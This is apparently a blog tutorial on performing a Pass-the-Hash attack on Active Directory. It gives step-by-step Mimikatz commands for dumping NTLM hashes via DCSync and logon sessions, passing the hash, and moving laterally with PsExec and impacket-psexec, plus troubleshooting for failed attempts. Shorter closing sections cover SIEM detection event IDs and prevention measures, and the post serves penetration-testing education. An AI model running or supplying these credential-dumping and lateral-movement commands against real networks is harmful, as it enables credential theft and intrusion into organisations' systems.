How to perform Pass The Hash Attack on Active Directory in 2024?

What is Pass The Hash Attack?

Pass The Hash is a type of attack technique in which attacker steals the hashed user’s password and this hash is used to authenticate user or services. This technique bypasses standard authentication steps that normally require a user’s original password, allowing attackers seamless entry as though they were legitimate users

Requirements for Pass The Hash Attack?

1. The attacker must have some form of access to the target system, which could be through compromised credentials, phishing, or exploiting vulnerabilities.
2. Extracted NTLM hashes.
3. Administrative access privileges on the initial compromised system.

Tools Used In Pass The Hash Attack?

1. Impacket :  A tool written on python used for penetration testing network protocols.
2. Mimikatz : Mimikatz is a powerful open-source tool that helps to extract credentials on Windows operating systems.

How to perform Pass The Hash Attack on Active Directory?

Steps to Perform the Attack

Step 1. Dump NTLM Hashe of specific user Using DC Sync

First, you need to dump the hashes of user accounts from the Domain Controller (DC). Use Mimikatz for this:

lsadump::dcsync /domain:server.local /user:Rosetta.Jena

This command will retrieve the NTLM hash for the specified user.

Dump hash of all stored logon credentials from the current sessions on the machine using mimikatz tool.

privilege::debug

sekurlsa ::logonpasswords

Step 2. Perform the Pass-the-Hash Attack

With the required hash in hand, execute the following command in Mimikatz:

privilege::debug

sekurlsa::pth /user:username_here /domain:domain.local /ntlm:hash_here

• /user:username_here: The target username.
• /domain:domain.local: The domain of the target account.
• /ntlm:hash_here: The NTLM hash of the target user.

Step 3. A new command prompt will automatically open

In that terminal, run:

PsExec.exe \\10.0.0.71 cmd.exe

• 10.0.0.71: The IP address of the victim’s machine.

OR

Step 1 Using Impacket to perform Pass The Hash Attack.

Once you have the NTLM hash, use Impacket to authenticate to the target system:

impacket-psexec 'SERVER/username@IP_HERE' -hashes 'ntlm_hash_here'

• SERVER: The target server or workstation.
• username: The username for which you have the hash.
• IP_HERE: The IP address of the target machine.
• ntlm_hash_here: The NTLM hash obtained from the previous step.

Complete Video Tutorial

Troubleshooting Common Errors.

Error: “Make sure that the default admin$ share is enabled.”

If you encounter this error, follow one of the solutions below:

Solution 1: Enable the admin$ share.

1. Go to C:\Windows.
2. Right-click and select Properties.
3. Click on Advanced Sharing.
4. Check the box for Share this folder.
5. Enter the name admin$.
6. Hit Permissions, and it is recommended to remove ‘Everyone’ and add only the users that PsExec will use for execution.

Solution 2: Ensure the victim user has local administrator privileges on their machine.

How to detect pass the hash attack using SIEM?

To detect Pass-the-Hash attacks in a SIEM, monitor authentication logs for anomalies (Event ID 4624 for successful logons, 4625 for failed logons), track NTLM authentication, identify the use of administrative tools (Event ID 4688 for process creation), analyze lateral movement patterns, check for anomalous account behavior, enable specific event alerts, monitor network traffic, leverage threat intelligence, correlate events across sources, and conduct regular audits and reviews.

How to prevent Pass The Hash Attack?

1. Implement MFA and prefer Kerberos over NTLM for stronger authentication.
2. Apply the principle of least privilege and use dedicated admin workstations.
3. Keep systems updated with patches and monitor for vulnerabilities.
4. Enforce strong password policies and educate users on password hygiene.
5. Limit access to critical systems and control lateral movement through segmentation.
6. Monitor authentication logs and use Intrusion Detection Systems (IDS).
7. Enable Windows Credential Guard and disable NTLM where feasible.
8. Conduct regular audits of user accounts and remove unused accounts.
9. Provide security awareness training and conduct phishing simulations.
10. Use anti-virus solutions and regularly scan endpoints for vulnerabilities.

Conclusion

This guide provides a structured approach to performing a Pass-the-Hash attack using Mimikatz and Impacket in a Windows environment. Always ensure that you have permission to conduct such activities in your network to comply with legal and ethical standards.

Read Similar Articles:

How to perform Golden Ticket Attack in Active Directory in 2024?